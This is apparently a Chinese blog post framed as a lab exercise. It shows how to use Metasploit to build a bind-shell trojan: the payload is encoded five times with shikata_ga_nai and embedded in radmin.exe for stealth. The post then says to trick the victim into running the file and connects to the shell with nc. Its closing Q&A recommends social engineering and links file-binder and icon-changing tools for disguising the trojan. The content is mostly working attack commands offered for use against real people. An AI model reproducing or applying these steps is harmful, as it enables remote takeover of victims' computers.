使用kai窃听对方pc

发布于 2024-07-21  25 次阅读


AI 摘要

# 使用kai窃听对方PC **实验目的:** 通过kali系统中的Meraspoloit Framework框架中的生成 payload已达到完全控制对方PC。 **实验环境:** Kali(2018版本)攻击者与win7被攻击者,两者可以相互通信。 **实验过程:** 1. 在kali终端输入:msfconsole 进入此框架。 2. 使用框架中的payload模块,输入命令: ``` use payload/windows/shell_bind_tcp show options ``` 查看详细信息(此时设置的是连接4444端口)。 3. 输入坏字符生成命令:generate。 4. 生成程序: ``` generate -b ‘x00ff’ -t exe -e x86/shikata_ga_nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -f /root/1.exe ``` 解释: -t 指定我们要输出什么格式。 -i 使用五轮。 -k 是在运行过程中不会产生新的进程,提升隐蔽性。 -f 输出目标文件所在的路径。 5. 到目的路径找到生成的程序,并且使得目标机打开这个程序(因为现在是实验所以这里直接就拷贝过去了)。 6. 诱骗被攻击者打开

一,实验目的:

通过kali系统中的Meraspoloit Framework框架中的生成 payload已达到完全控制对方PC

二,实验环境:

Kali(2018版本)攻击者与win7被攻击者,两者可以相互通信

图片

三,实验过程:

①在kali终端输入:msfconsole 进入此框架

图片

②:使用框架中的payload模块

输入命令:

use payload/windows/shell_bind_tcp

图片

show options查看详细信息(此时设置的是连接4444端口)

图片

③输入坏字符生成命令:generate

图片

④:生成程序:

generate -b ‘\x00\ff’ -t exe -e x86/shikata_ga_nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -f /root/1.exe

图片

解释:

-t 指定我们要输出什么格式

-i 使用五轮

-k 是在运行 过程中不会产生新的进程,提升隐蔽性

-f 输出目标文件所在的路径

⑤:到目的路径找到生成的程序,并且使得目标机打开这个程序(因为现在是实验所以这里直接就拷贝过去了)

图片

⑥:诱骗被攻击者打开我们的目标程序

图片

图片

四,进行实验验证

此时被攻击者的4444端口已经被打开了

图片

成功:

kali 终端输入:nc 192.168.1.110 4444

图片

复盘:

问:对方如何会打开我们的制作的木马?

答:我们可以使用社会工程学的知识来使对方打开我们的目标文件程序。

这里我们提供几个工具,工具一文件捆绑器:

https://pan.baidu.com/s/1jRW8Sy9H_lovD4ge-oglCQ

提取码:bjjq

工具二修改图标

链接:https://pan.baidu.com/s/1Jqofy92dJs2Eobup5aL4rA

提取码:f8nj

  • alipay_img
站长大大
最后更新于 2024-07-21